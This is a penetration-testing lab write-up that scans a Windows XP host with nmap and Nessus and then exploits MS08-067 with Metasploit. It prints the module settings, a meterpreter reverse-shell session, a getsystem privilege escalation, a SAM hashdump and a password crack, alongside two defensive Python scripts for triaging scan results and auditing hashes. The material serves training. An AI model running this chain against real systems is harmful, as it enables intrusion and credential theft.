Vulnerability Assessment (Nessus)

In this lab we will use Nessus, Tenable's vulnerability scanner, to perform a vulnerability assessment and then, optionally, exploit the vulnerability it finds.

Description

In this lab you will have to use and configure Nessus to perform a vulnerability scan against the target machine. However, you are not told where the target machine is in the network; you only know it is in the same lab network you are connected to.

Goal

The goal of this lab is to learn how to properly configure Nessus depending on the services running on the target machine.

Tools

The best tools for this lab are:

  • Nessus

  • Metasploit

Steps

Find a target in the network

Since we do not have any information about our lab network and the hosts attached to it, the first step is to find our target!

Identify the target role

Now that we know there is a host on the target network, let us scan the host and gather as much information as we can in order to properly configure the Nessus scan.

Configure Nessus and run the scan

You should have identified a few services running on the machine. Configure a new Nessus policy and scan based on the results of the previous step.

Analyze and export the scan results

Once the scan completes, open the results and analyze them. You will find something very interesting! Also export the scan results; you may need them!

[OPTIONAL] Exploit the machine

The target machine has a few critical vulnerabilities. Once you finish studying the Metasploit module, start the lab over again and try to exploit the machine.

Solutions

Let's verify that we are connected to the lab environment by checking our IP address.

We now know that our interface has the address 192.168.99.70/24, so the lab network is 192.168.99.0/24.

Now I'll do a ping sweep to detect other hosts present in the network:

┌──(kali㉿kali)-[~]
└─$ fping -a -g 192.168.99.0/24 2>/dev/null
192.168.99.70
192.168.99.50
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$  

Apart from our own IP, there is one other host: 192.168.99.50.

Now that we have a target, let's gather information about it with nmap so that we can configure the Nessus scan for the vulnerability assessment:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -O -A -p- 192.168.99.50 -vv 

[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 15:43 EDT
NSE: Loaded 154 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating ARP Ping Scan at 15:43
Scanning 192.168.99.50 [1 port]
Completed ARP Ping Scan at 15:43, 0.57s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.04s elapsed
Initiating SYN Stealth Scan at 15:43
Scanning 192.168.99.50 [65535 ports]
Discovered open port 139/tcp on 192.168.99.50
Discovered open port 135/tcp on 192.168.99.50
Discovered open port 445/tcp on 192.168.99.50
Increasing send delay for 192.168.99.50 from 0 to 5 due to 589 out of 1963 dropped probes since last increase.
SYN Stealth Scan Timing: About 4.56% done; ETC: 15:55 (0:10:49 remaining)
SYN Stealth Scan Timing: About 5.06% done; ETC: 16:04 (0:19:05 remaining)
SYN Stealth Scan Timing: About 5.52% done; ETC: 16:11 (0:25:56 remaining)
SYN Stealth Scan Timing: About 5.98% done; ETC: 16:17 (0:31:43 remaining)
SYN Stealth Scan Timing: About 6.44% done; ETC: 16:23 (0:36:35 remaining)
SYN Stealth Scan Timing: About 6.80% done; ETC: 16:28 (0:41:20 remaining)
SYN Stealth Scan Timing: About 7.14% done; ETC: 16:33 (0:45:43 remaining)
SYN Stealth Scan Timing: About 7.48% done; ETC: 16:37 (0:49:43 remaining)
SYN Stealth Scan Timing: About 7.76% done; ETC: 16:42 (0:53:39 remaining)
SYN Stealth Scan Timing: About 8.05% done; ETC: 16:46 (0:57:18 remaining)
SYN Stealth Scan Timing: About 8.32% done; ETC: 16:50 (1:00:49 remaining)
SYN Stealth Scan Timing: About 8.62% done; ETC: 16:54 (1:04:17 remaining)
SYN Stealth Scan Timing: About 8.95% done; ETC: 16:58 (1:07:51 remaining)
SYN Stealth Scan Timing: About 13.52% done; ETC: 16:58 (1:04:06 remaining)
SYN Stealth Scan Timing: About 16.37% done; ETC: 16:55 (1:00:07 remaining)
SYN Stealth Scan Timing: About 23.32% done; ETC: 16:57 (0:56:27 remaining)
SYN Stealth Scan Timing: About 28.84% done; ETC: 16:58 (0:52:44 remaining)
SYN Stealth Scan Timing: About 31.21% done; ETC: 16:55 (0:48:58 remaining)
Stats: 0:23:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.09% done; ETC: 16:53 (0:46:29 remaining)
Stats: 0:23:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 16:52 (0:44:16 remaining)
SYN Stealth Scan Timing: About 38.19% done; ETC: 16:49 (0:40:45 remaining)
SYN Stealth Scan Timing: About 41.50% done; ETC: 16:47 (0:37:20 remaining)
SYN Stealth Scan Timing: About 45.09% done; ETC: 16:46 (0:34:08 remaining)
SYN Stealth Scan Timing: About 48.84% done; ETC: 16:44 (0:30:57 remaining)
SYN Stealth Scan Timing: About 52.66% done; ETC: 16:42 (0:27:54 remaining)
SYN Stealth Scan Timing: About 56.78% done; ETC: 16:41 (0:24:55 remaining)
SYN Stealth Scan Timing: About 61.14% done; ETC: 16:40 (0:22:01 remaining)
SYN Stealth Scan Timing: About 65.39% done; ETC: 16:39 (0:19:11 remaining)
SYN Stealth Scan Timing: About 69.96% done; ETC: 16:38 (0:16:22 remaining)
SYN Stealth Scan Timing: About 74.89% done; ETC: 16:37 (0:13:34 remaining)
SYN Stealth Scan Timing: About 79.84% done; ETC: 16:37 (0:10:47 remaining)
SYN Stealth Scan Timing: About 84.80% done; ETC: 16:37 (0:08:06 remaining)
SYN Stealth Scan Timing: About 89.77% done; ETC: 16:36 (0:05:24 remaining)
SYN Stealth Scan Timing: About 94.85% done; ETC: 16:36 (0:02:42 remaining)
Completed SYN Stealth Scan at 16:36, 3183.54s elapsed (65535 total ports)
Initiating Service scan at 16:36
Scanning 3 services on 192.168.99.50
Completed Service scan at 16:37, 8.12s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.99.50
Retrying OS detection (try #2) against 192.168.99.50
Retrying OS detection (try #3) against 192.168.99.50
Retrying OS detection (try #4) against 192.168.99.50
NSE: Script scanning 192.168.99.50.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:37
NSE Timing: About 99.76% done; ETC: 16:37 (0:00:00 remaining)
Completed NSE at 16:38, 53.78s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
Nmap scan report for 192.168.99.50
Host is up, received arp-response (0.41s latency).
Scanned at 2021-08-19 15:43:54 EDT for 3260s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT    STATE SERVICE      REASON          VERSION
135/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 128 Windows XP microsoft-ds
MAC Address: 00:50:56:A0:1A:8D (VMware)
OS fingerprint not ideal because: maxTimingRatio (1.468000e+00) is greater than 1.4
Aggressive OS guesses: Microsoft Windows XP SP3 (97%), Microsoft Windows XP SP2 or SP3, or Windows Embedded Standard 2009 (96%), Microsoft Windows XP SP2 or SP3 (96%), Microsoft Windows XP SP2 or SP3, or Windows Server 2003 (96%), Microsoft Windows XP Professional SP2 (96%), Microsoft Windows XP SP2 (96%), Microsoft Windows Mobile 6 (CE OS 5.0 - 5.2) (94%), Microsoft Windows Mobile 6.0 - 6.1 (94%), Microsoft Windows Server 2003 SP2 (94%), Microsoft Windows XP SP0 (94%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=8/19%OT=135%CT=1%CU=33613%PV=Y%DS=1%DC=D%G=N%M=005056%TM=611EC136%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=0)
OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC=N%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS%RD=0%Q=)
T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=S%T=80%CD=Z)

Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 3h30m28s, deviation: 4h57m00s, median: 27s
| nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a0:1a:8d (VMware)
| Names:
|   ELS-WINXP<00>        Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   ELS-WINXP<20>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   00 50 56 a0 1a 8d 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43397/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52653/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 17687/udp): CLEAN (Failed to receive data)
|   Check 4 (port 33047/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: els-winxp
|   NetBIOS computer name: ELS-WINXP\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-19T13:37:50-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT       ADDRESS
1   408.72 ms 192.168.99.50

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3263.51 seconds
           Raw packets sent: 72684 (3.201MB) | Rcvd: 69224 (2.782MB)
                                                                                                                                                                        
┌──(kali㉿kali)-[~]
└─$ 

Looking at the nmap output, we can tell that the target runs Windows: the open ports 135, 139 and 445 carry Microsoft RPC, NetBIOS and SMB, and the OS fingerprint points at Windows XP. So we can go ahead and configure Nessus to scan a Windows host.

Assuming Nessus is already installed on the system, I am proceeding with running the scans.

To start Nessus, we can either start it from Applications or run the following in a terminal:

  • systemctl start nessusd

That command starts the Nessus service. Then open a browser and visit https://127.0.0.1:8834/, which should show the Nessus login screen.

The quick way is Scans -> New Scan -> Advanced Scan: we only need to specify the target and a name for the scan, and we are ready to launch.

To tailor the scan to the Windows services found by nmap, instead go to Policies -> New Policy -> Advanced Scan and configure the policy accordingly.

Then navigate to My Scans -> New Scan -> User Defined, pick the policy, and launch the scan.

Analyze and export the scan results

From the scan results obtained in the previous step, we can see that the machine has some critical vulnerabilities.

The most interesting one is MS08-067:

This vulnerability allows attackers to execute code remotely! Keep it in mind if you want to exploit the machine!

This completes the lab. If you are interested in how to exploit the machine, you can proceed further; this may be a little advanced for newbies.
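Since the exported results are meant to be kept, here is a way to triage them offline. The following Python script is an added example, not part of the lab or of Tenable's tooling: it parses a `.nessus` (v2 XML) export with the standard library, counts findings per severity, and lists the ones at or above a chosen severity with their CVSS score, whether Nessus flags a public exploit, and the suggested fix. The embedded sample export is constructed for the example (placeholder plugin ids; findings chosen to match what nmap showed: SMB on 445, signing disabled, Windows XP) and is not the lab's real export.

```python
"""Triage a Nessus .nessus (v2 XML) export offline: per-host OS, counts per
severity, and the findings at or above a chosen severity sorted by CVSS."""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus encodes severity as 0..4 on each ReportItem.
SEVERITY = {"0": "Info", "1": "Low", "2": "Medium", "3": "High", "4": "Critical"}
RANK = {name: int(code) for code, name in SEVERITY.items()}

# Constructed sample export: the element names follow the .nessus v2 layout,
# but the plugin ids are placeholders and the findings were written for this
# example to mirror what nmap showed (SMB on 445, signing disabled, Windows XP).
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
<Report name="lab-winxp">
<ReportHost name="192.168.99.50">
<HostProperties>
<tag name="host-ip">192.168.99.50</tag>
<tag name="operating-system">Microsoft Windows XP</tag>
</HostProperties>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="0"
 pluginName="MS08-067: Server Service Crafted RPC Request Remote Code Execution" pluginFamily="Windows">
<risk_factor>Critical</risk_factor>
<cvss_base_score>10.0</cvss_base_score>
<exploit_available>true</exploit_available>
<solution>Apply the MS08-067 security update.</solution>
</ReportItem>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2" pluginID="0"
 pluginName="SMB Signing not required" pluginFamily="Misc.">
<risk_factor>Medium</risk_factor>
<cvss_base_score>5.3</cvss_base_score>
<solution>Enforce message signing in the host's SMB configuration.</solution>
</ReportItem>
<ReportItem port="139" svc_name="smb" protocol="tcp" severity="0" pluginID="0"
 pluginName="Windows NetBIOS / SMB Remote Host Information Disclosure" pluginFamily="Windows">
<risk_factor>None</risk_factor>
</ReportItem>
</ReportHost>
</Report>
</NessusClientData_v2>
"""


def parse_report(xml_text):
    """Return one dict per ReportHost with its properties and parsed findings."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("ReportHost"):
        props = {tag.get("name"): (tag.text or "") for tag in host.iter("tag")}
        items = []
        for item in host.findall("ReportItem"):
            items.append({
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "severity": SEVERITY.get(item.get("severity"), "Info"),
                "plugin": item.get("pluginName", ""),
                "cvss": float(item.findtext("cvss_base_score") or 0.0),
                "exploit_available": item.findtext("exploit_available") == "true",
                "solution": (item.findtext("solution") or "").strip(),
            })
        hosts.append({
            "ip": host.get("name"),
            "os": props.get("operating-system", "unknown"),
            "items": items,
        })
    return hosts


def severity_counts(hosts):
    """Count findings per severity label across all hosts."""
    return dict(Counter(item["severity"] for h in hosts for item in h["items"]))


def findings_at_least(hosts, minimum="High"):
    """Findings at or above `minimum` severity, highest CVSS first."""
    rows = [
        (h["ip"], item["port"], item["plugin"], item["cvss"],
         item["exploit_available"], item["solution"])
        for h in hosts
        for item in h["items"]
        if RANK[item["severity"]] >= RANK[minimum]
    ]
    return sorted(rows, key=lambda r: r[3], reverse=True)


if __name__ == "__main__":
    hosts = parse_report(SAMPLE_NESSUS)
    for h in hosts:
        print(f"{h['ip']} ({h['os']}): {severity_counts([h])}")
    for ip, port, plugin, cvss, exploitable, fix in findings_at_least(hosts):
        flag = " [public exploit]" if exploitable else ""
        print(f"  {cvss:>4} {ip}:{port} {plugin}{flag}\n       fix: {fix}")
```

To run it against a real export, read the `.nessus` file into a string and pass it to `parse_report` instead of `SAMPLE_NESSUS`; the `exploit_available` flag and the CVSS sort are what turn a long report into a remediation order.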

Exploitation

Now that I have a vulnerability that allows me to attack the machine, let's go ahead and try to exploit it using Metasploit.

Metasploit is a tool from Rapid7 that automates payload delivery and exploitation. You can read more about it online.

To start Metasploit, use the command:

  • msfconsole (the -q switch is optional; it skips the startup banner and saves me some time)

I searched for the ms08-067 exploit and found a matching module.

Use the exploit and set the required fields as shown below:

msf5 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.101.14   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.99.50
RHOSTS => 192.168.99.50
msf5 exploit(windows/smb/ms08_067_netapi) > set LhOST 192.168.99.70
LhOST => 192.168.99.70
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.99.50    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.99.70    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) >

It's time to run the exploit:

msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.99.70:4444 
[*] 192.168.99.50:445 - Automatically detecting the target...
[*] 192.168.99.50:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.99.50:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.99.50:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 192.168.99.50
[*] Meterpreter session 1 opened (192.168.99.70:4444 -> 192.168.99.50:1031) at 2021-08-19 16:17:03 -0400

meterpreter >
meterpreter > sysinfo
Computer        : ELS-WINXP
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

As you can see, we are in the Windows system. Now let's check the IP address of the system:

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:50:56:a0:1a:8d
MTU          : 1500
IPv4 Address : 192.168.99.50
IPv4 Netmask : 255.255.255.0

meterpreter > 

Privilege Escalation

After that, we escalate our privileges to SYSTEM:

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Yay!!!! We have successfully exploited the Windows system!!!

{BONUS} Hashdump & Cracking

Now let's get the SAM entries from the system and crack the hashes.

If you are wondering what the SAM is: it stands for Security Account Manager, the database where Windows stores the local account names and their password hashes.

meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:67fb9805a02c8249aad3b435b51404ee:b0c6522c478a0886fb92544d16c75679:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
netadmin:1004:6d4c8d28110c649d1f6252914a7633d7:1f1c7bfdba645b14c37dde4465b59542:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
meterpreter > 
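Before handing a dump like this to a cracker, there is a lot a defender can read off the format itself. The following Python script is an added example, not part of the lab or of Metasploit: it parses pwdump-style lines (`user:rid:LM:NT:::`) and reports weak credential storage rather than cracking anything: accounts whose LM hash is still stored, accounts whose LM hash gives away a password of seven characters or fewer, accounts with an empty password, and accounts sharing the same password. The sample input is the hashdump output from the lab above; the two constants are the well-known LM and NT hashes of the empty password.

```python
"""Audit a pwdump-style hashdump (user:rid:LM:NT:::) for weak credential
storage instead of cracking it: LM hashes still kept, short passwords the
LM format gives away, empty passwords, and passwords shared between accounts."""
import re

# LM hash of an empty (or disabled) password: each 8-byte half is the DES
# encryption of a fixed constant under an all-zero 7-byte key.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password: MD4 of the empty UTF-16LE string.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

ISSUE_LM_STORED = "LM hash stored (disable LM storage via NoLMHash)"
ISSUE_LM_SHORT = "LM second half is empty: password is 7 characters or fewer"
ISSUE_EMPTY_PW = "empty password"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Sample input: the hashdump lines from the lab output above.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:67fb9805a02c8249aad3b435b51404ee:b0c6522c478a0886fb92544d16c75679:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
netadmin:1004:6d4c8d28110c649d1f6252914a7633d7:1f1c7bfdba645b14c37dde4465b59542:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
"""


def parse_hashdump(text):
    """Parse pwdump lines into dicts; reject anything that is not in the format."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        entries.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return entries


def audit(entries):
    """Return (user, rid, [issues]) for every account with a weakness."""
    findings = []
    for e in entries:
        issues = []
        if e["lm"] != EMPTY_LM:
            issues.append(ISSUE_LM_STORED)
            # LM pads the upper-cased password to 14 bytes and hashes the two
            # 7-byte halves independently, so an empty second half means the
            # password never reached the eighth character.
            if e["lm"][16:] == EMPTY_LM[16:]:
                issues.append(ISSUE_LM_SHORT)
        if e["nt"] == EMPTY_NT:
            issues.append(ISSUE_EMPTY_PW)
        if issues:
            findings.append((e["user"], e["rid"], issues))
    return findings


def shared_passwords(entries):
    """Accounts grouped by identical NT hash (same password), only groups > 1."""
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    return {nt: users for nt, users in by_nt.items() if len(users) > 1}


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_DUMP)
    for user, rid, issues in audit(entries):
        print(f"{user} (RID {rid}): " + "; ".join(issues))
    for users in shared_passwords(entries).values():
        print("same password: " + ", ".join(users))
```

On the lab's dump this flags four accounts for keeping LM hashes at all, notes that eLSAdmin's password is at most seven characters, and reports Guest as having an empty password; those three observations are the remediation items (turn off LM hash storage, enforce a minimum length, disable or set a password on Guest) regardless of whether any hash is ever cracked.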

OK, now that we have the SAM hashes, we will save them to a file for cracking.

To crack the hashes, I'll use my favorite tool, John the Ripper, with the rockyou.txt wordlist.

Boom!!!! There you go, we have the password for "Administrator".

That's it for today, see ya, until next time, bye 🥰.
